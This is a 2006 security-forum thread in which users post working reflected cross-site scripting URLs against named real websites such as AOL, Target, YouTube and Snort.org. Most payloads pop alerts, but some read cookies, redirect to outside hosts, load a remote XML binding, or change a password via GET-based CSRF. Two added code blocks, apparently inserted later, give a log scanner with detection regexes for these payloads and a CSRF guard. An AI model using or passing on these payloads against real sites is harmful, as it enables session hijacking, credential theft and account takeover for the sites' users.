Re: So it begins
Posted by: jungsonn
Date: November 20, 2006 12:58AM

Great work!

Wow! :-()
and that one a single domain...
AOL should crawl in a dark hole for aeons for these.

Re: So it begins
Posted by: id
Date: November 20, 2006 01:18AM

ok, I owe unsticky a beer, great job.

-id

Re: So it begins
Posted by: jungsonn
Date: November 20, 2006 01:44AM

@Maluc:

i had it in my clipboard and was too lazy to type a new vector,
but document.location() does not work, i tried it.
document.location.replace does work:

(could take some time to load)
http://www.snap.com/search.php#%22%3E%3Cscript%3Ealert('Gimme%20a%20break%20dudes...')%3Bdocument.location.replace('http://sla.ckers.org')%3B%3C%2Fscript%3E%3C%22



Edited 2 time(s). Last edit at 11/20/2006 01:48AM by jungsonn.

Re: So it begins
Posted by: maluc
Date: November 20, 2006 02:26AM

i stand corrected ^^ .. guess i didn't give it enough of a chance to load..

for the standard way i mentioned.. it wasn't with document.location() but rather document.location='blah'

http://www.snap.com/search.php#%22%3E%3Cscript%3Ealert('Gimme%20a%20break%20dudes...')%3Btop.document.location%3D'http://sla.ckers.org'%3B%3C%2Fscript%3E%3C%22

but for cases where equals is filtered.. that's a nice alternative, i'll keep it in mind ^^ (without having to use eval() which is a pain.)

and nice job unsticky.. some have been posted before but most appear new. fortunately for aol, half of them look to stem from the same reused code.

-maluc
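The exchange above turns on a detail of the DOM: `document.location` is a Location object, so calling it fails, while assigning to it or calling `.replace()` navigates, and the `.replace()` form needs no `=` character. As an added example (not code from this thread), here is a small log-triage scanner that URL-decodes query parameters and flags the idioms posted in this thread: the `">`-breakout into `<script>`, the `javascript:` URI, both navigation forms, and the `-moz-binding`/`expression()` CSS vector. The request paths and hosts are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed request paths modelled on the vectors in this thread (hosts are placeholders):
# script breakout with location.replace(), the same with top.document.location=, a javascript:
# URI, a CSS -moz-binding/expression() injection, a double-encoded breakout, two benign queries.
SAMPLE_REQUESTS = [
    "/search.php?q=%22%3E%3Cscript%3Ealert(1)%3Bdocument.location.replace('http://example.invalid')%3B%3C%2Fscript%3E%3C%22",
    "/search.php?q=%22%3E%3Cscript%3Etop.document.location%3D'http://example.invalid'%3B%3C%2Fscript%3E%3C%22",
    "/elqRedir.htm?ref=javascript:alert(1)",
    "/searchamvs.php?swords='+style=-moz-binding:url(http://example.invalid/x.xml%23xss);xx:expression(alert(1))",
    "/search.php?q=%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E",
    "/video.php?category=md&viewtype=trailers",
    "/search?q=how+to+replace+a+document+location",
]

# Each pattern names one idiom from the thread; they run over the decoded parameter value.
PATTERNS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "js_uri": re.compile(r"^\s*javascript\s*:", re.I),
    # document.location='...' and document.location.replace('...') both navigate; only the first needs '='.
    "nav_assign": re.compile(
        r"\b(?:(?:top|parent|window|self)\.)?(?:document|window)\.location(?:\.href)?"
        r"\s*(?:=(?!=)|\.(?:replace|assign)\s*\()", re.I),
    "css_binding": re.compile(r"-moz-binding\s*:|\bexpression\s*\(", re.I),
}

def decode_value(value, max_passes=3):
    """URL-decode repeatedly (bounded) so a double-encoded payload is seen the way
    the browser or server will eventually see it."""
    for _ in range(max_passes):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(path):
    """Return the sorted names of patterns that fire on any query parameter of `path`."""
    hits = set()
    for field in urlsplit(path).query.split("&"):
        _name, _sep, raw = field.partition("=")  # split on the first '=' only
        value = decode_value(raw)
        hits.update(name for name, pat in PATTERNS.items() if pat.search(value))
    return sorted(hits)

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(scan_request(request) or "clean", request)
```

Matches are a triage signal for access logs, not a filter: the fix for every URL in this thread is encoding the reflected value for the HTML or attribute context it lands in.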

Re: So it begins
Posted by: rsnake
Date: November 20, 2006 10:40AM

Yah, agreed, unsticky. Holy crap! Guess AOL has some work to do.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: unsticky
Date: November 20, 2006 12:49PM

Yeah, I know I posted a few of them before, but I put them all into one list, and didn't really feel like going through page after page on the forum to find my post and then compare and remove the old ones. :/ And as Maluc said, most do seem to stem from the same reused, insecure code to handle the icid and aolp GET variables. I probably missed a bunch of vulns simply because I got fed up with copy and pasting URLs from my address bar. They definitely need some work, especially with the vulns in the https login pages, which can very easily be used to redirect the form and steal login credentials... *cough*

Re: So it begins
Posted by: Kyran
Date: November 20, 2006 03:26PM

http://www.mininova.org/search/?search=%3Chmm%27;%0D%0A//--%3E%3C/script%3E%3Cscript%3E%0D%0Aalert(1337);%0D%0A%3C/script%3E%0D%0A

- Kyran

Re: So it begins
Posted by: rsnake
Date: November 20, 2006 04:40PM

That's some pretty crazy obfuscation there, Kyran!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: November 20, 2006 10:37PM

Yeah, that one took a while. If you touch pretty much anything but where the alert is, it won't work.

- Kyran

Re: So it begins
Posted by: zwerg
Date: November 20, 2006 11:35PM

A couple more discovered in the last couple of days.

http://www.samsclub.com/eclub/main_clublocator.jsp?isCNP=&zipcode=12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.samsclub.com/shopping/navigate.do?dest=8&returnTo=http%3A%2F%2Fwww.samsclub.com%2Fshopping%2Fnavigate.do%3Fcatg%3D618'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://sites.target.com/site/en/spot/map.jsp?streetaddress=&city=&state=&zip12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&clientPOI2=1&closestn=3&closestprox=1&miles=200&screen=find&link=results&width=450&height=338&orig_iconid=24&_requestid=1340621

see you later,

--z

Re: So it begins
Posted by: rsnake
Date: November 21, 2006 12:01AM

Domain squatting XSS: http://searchportal.information.com/?epl=&debug=0&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 21, 2006 12:03AM

http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 21, 2006 12:05AM

http://search.gifts.com/?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 21, 2006 12:10AM

http://dynamic.si.cnn.com/covers/search?searchSpec=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Spikeman
Date: November 21, 2006 01:17AM

http://www.omfg.com/quickResults.asp?searchtype=D&searchfield=<script>alert('omfg')</script>

Someone should seriously make a list of everything disclosed, I'm always paranoid about re-finding holes.. Maybe a database or something (rsnake/id)...



Edited 1 time(s). Last edit at 11/21/2006 01:19AM by Spikeman.

Re: So it begins
Posted by: jungsonn
Date: November 21, 2006 01:18AM

http://area.autodesk.com/external.php?link=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C%22

Re: So it begins
Posted by: jungsonn
Date: November 21, 2006 01:25AM

As of today i just go to sites i find in my e-mail. I'm too lazy to Google for it :) Like this.

http://www.haporn.com/video.php?category=md&viewtype=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22

Re: So it begins
Posted by: nrg
Date: November 21, 2006 05:56AM

http://cbs4boston.com/slideshows/photoalbum_slideshow_324160333/view?slide=%3Cscript%3Ealert(document.cookie)%3C/script%3E

--
http://chasenet.org/home/

Re: So it begins
Posted by: Tribute
Date: November 21, 2006 11:35AM

http://www.overclockers.co.uk/search_results.php?sortby=&groupid=&string=%22%3E%27%3E%3CSCRIPT%3Ealert%28%27boom%27%29%3C%2FSCRIPT%3E

Re: So it begins
Posted by: Kyran
Date: November 21, 2006 12:38PM

http://www.youtube.com/signup?signup_type=xss%22%20/%3E%3Cscript%3Ealert(1337)%3C/script%3E More youtube.

- Kyran

Re: So it begins
Posted by: maluc
Date: November 21, 2006 02:31PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://nighteffect.com/tns/index.php&SortOrder=Desc%3Cscript%3Ealert(%22XSS%22)%3C/script%3E nighteffect.com

-maluc

Re: So it begins
Posted by: maluc
Date: November 21, 2006 08:08PM

https://www.edwinwattsgolf.com/webapp/wcs/stores/servlet/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: r0xes
Date: November 21, 2006 08:22PM

Hai guys. I finally registered here..mahah.
Anyways, I've been bored.

http://www.santaclarauniv.org/go/esuppress.asp?pin=abcdfuckingpin8&c=111&e=%3Cscript%3Ealert(/omgawhsex/)%3C/script%3E&ln=CBSS

Lawl.

Re: So it begins
Posted by: Ghozt
Date: November 21, 2006 11:27PM

http://www.sourcefire.com/elqNow/elqRedir.htm?ref=javascript:alert(%22Hello.%22%29



Edited 1 time(s). Last edit at 11/21/2006 11:30PM by Ghozt.

Re: So it begins
Posted by: Ghozt
Date: November 21, 2006 11:48PM

This doesn't say much for Snort's intrusion detection:
XSS and CSRF in snort.org
http://www.snort.org/pub-bin/search.cgi?search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E (XSS)
https://www.snort.org/reg-bin/userprefs.cgi?action=change_password&new_password=NewPassword&new_password_verify=NewPassword (CSRF/Password Change)
Both work with GET. The forums look custom coded and they didn't filter the search at all, so who knows what havoc you could wreak.
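The second URL above shows why a state-changing action must never be reachable by a plain GET: any link or image tag on another site fires it with the victim's cookies. As an added example (not the site's code), here is a request guard written against the parameter names in that URL. The session record, `site_origin`, the `Origin` header check and the `csrf_token` field are all constructed assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs

def new_session(user="alice"):
    """Constructed session record: a logged-in user with a per-session CSRF token."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}

def authorize_password_change(method, origin, site_origin, query, session):
    """Decide whether a change_password request may proceed; returns (ok, reason).

    The request has to be a POST (a GET that changes state is triggerable from any
    page), come from this site's own Origin, carry the session's CSRF token
    (compared in constant time), and have non-empty, matching password fields.
    """
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if params.get("action") != "change_password":
        return False, "not a password change"
    if method.upper() != "POST":
        return False, "state change over GET refused"
    if origin != site_origin:
        return False, "request origin is not this site"
    supplied = params.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    new, verify = params.get("new_password", ""), params.get("new_password_verify", "")
    if not new or new != verify:
        return False, "password fields empty or different"
    return True, "ok"

if __name__ == "__main__":
    s = new_session()
    site = "https://forum.example"  # constructed
    q = "action=change_password&new_password=NewPassword&new_password_verify=NewPassword"
    print(authorize_password_change("GET", site, site, q, s))                          # refused
    print(authorize_password_change("POST", site, site, q + "&csrf_token=" + s["csrf_token"], s))
```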

Re: So it begins
Posted by: rsnake
Date: November 21, 2006 11:54PM

http://promosearch.atomz.com/search/promosearch?query=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp-q=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp_a=sp1000a5a9&sp_f=ISO-8859-1&sp_t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-k=&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=&counter=&search=New+Search

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Spikeman
Date: November 22, 2006 04:06AM

http://rockmanamv.com/searchamvs.php?swords='+style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss);xx:expression(alert(1337%29%29%3B



Edited 1 time(s). Last edit at 11/22/2006 04:07AM by Spikeman.

Re: So it begins
Posted by: jungsonn
Date: November 22, 2006 05:59AM

http://search.denverpost.com/sp?aff=26&keywords=%22%3E%3Cscript%3Esay+%3D+prompt%28%27Yo%2C+whats+up%3F+what+do+you+think+about+this+XSS+hole%3F%27%2C%27%27%29%0D%0Aif%28say%29+%7B+alert%28%27You+said%3A%27%2Bsay%29+%7D+else+%7B+alert%28%27Common%21+this+is+fun+%3B%29%27%29%3B+%7D+%3C%2Fscript%3E%3C%22&searchbutton.x=0&searchbutton.y=0&searchbutton=Search

Re: So it begins
Posted by: jungsonn
Date: November 22, 2006 06:13AM

Wicked.
http://search.wickedlocal.com/sp?keywords=%3Cscript%3Edocument.write('%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E');%3C/script%3E&search=&p=sb_integrated_search

Re: So it begins
Posted by: WhiteAcid
Date: November 22, 2006 02:24PM

Here's one I enjoyed.
I was searching for a specific post in this thread until I came across this one:
http://cccure.org/modules.php?myh_op=show_all%3Cscript%3Ealert(2)%3C/script%3E (well... it was something like that). That flaw has been fixed and they now have an error page. That error page has the user agent printed on it; using the Flash and IE thing that was written about ages ago, we can once again abuse this.
http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://cccure.org/modules.php?myh_op=show_all<script%3Ealert(2)%3C/script%3E&User-agent=<script>alert(1)</script>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
